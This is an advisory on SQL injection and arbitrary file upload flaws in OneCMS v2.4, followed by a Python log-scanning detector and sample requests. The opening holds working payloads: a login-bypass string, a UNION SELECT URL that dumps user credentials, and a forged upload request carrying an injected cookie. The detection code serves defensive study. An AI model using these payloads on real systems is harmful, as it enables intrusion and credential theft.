OneCMS Arbitrary File Upload Vulnerability and Multiple SQL-injection Vulnerabilities
An attacker can use a browser to exploit these issues. The following proofs of concept are available:

SQL-injection attack:

Username: admin' or 1=1 /*
Password: something

http://www.example.com/OneCMS_v2.4/staff.php?user=aaa' union select 1,username,password,1,1,1,1,1,1,1,1,1,1 from onecms_users/* '

Arbitrary-file-upload attack:

POST /OneCMS_v2.4/a_upload.php?view=add2 HTTP/1.0
Cookie: username=admin'or 1=1/*; password=96e79218965eb72c92a549dd5a330112; login_date=1199693273; style=Trend
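For reviewing web-server logs against the request shapes above, the following is an added detection example, not part of the original advisory or of OneCMS. It flags query parameters and cookie values that contain a quote followed by a tautology, a UNION SELECT, or a comment opener; the function names, the regular expression and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Shapes taken from the advisory's payloads: a quote that closes the string
# literal, then a numeric tautology, a UNION SELECT, or a comment opener.
SQLI = re.compile(r"'\s*(or\s+\d+\s*=\s*\d+|union\s+select)|'.*/\*", re.I | re.S)

def normalise(value, rounds=3):
    """Undo repeated URL-encoding so %2527 and %27 both become a quote."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def parse_cookies(header):
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name] = value
    return cookies

def inspect(request_line, cookie_header=""):
    """Return (location, parameter) pairs whose value looks like SQL injection."""
    _method, _, rest = request_line.partition(" ")
    target = rest.rsplit(" HTTP/", 1)[0]   # tolerate raw spaces in the target
    fields = [("query", n, v)
              for n, vs in parse_qs(urlsplit(target).query, keep_blank_values=True).items()
              for v in vs]
    fields += [("cookie", n, v) for n, v in parse_cookies(cookie_header).items()]
    return [(where, name) for where, name, value in fields
            if SQLI.search(normalise(value))]

# Constructed sample requests (paths and parameter names are from the advisory).
SAMPLES = [
    ("GET /OneCMS_v2.4/staff.php?user=aaa%27%20union%20select%201,username,password%20from%20onecms_users/* HTTP/1.0", ""),
    ("POST /OneCMS_v2.4/a_upload.php?view=add2 HTTP/1.0",
     "username=admin'or 1=1/*; password=PLACEHOLDER; style=Trend"),
    ("GET /OneCMS_v2.4/staff.php?user=o%27brien HTTP/1.0", "username=editor; style=Trend"),
    ("GET /OneCMS_v2.4/staff.php?user=x%2527%2520or%25201%253D1 HTTP/1.0", ""),
]

if __name__ == "__main__":
    for line, cookie in SAMPLES:
        print(inspect(line, cookie) or "clean", "<-", line.split(" HTTP/")[0])
```

A pattern match of this kind is a triage aid for logs; the underlying fix is parameterized queries in the application and authentication that does not trust cookie contents.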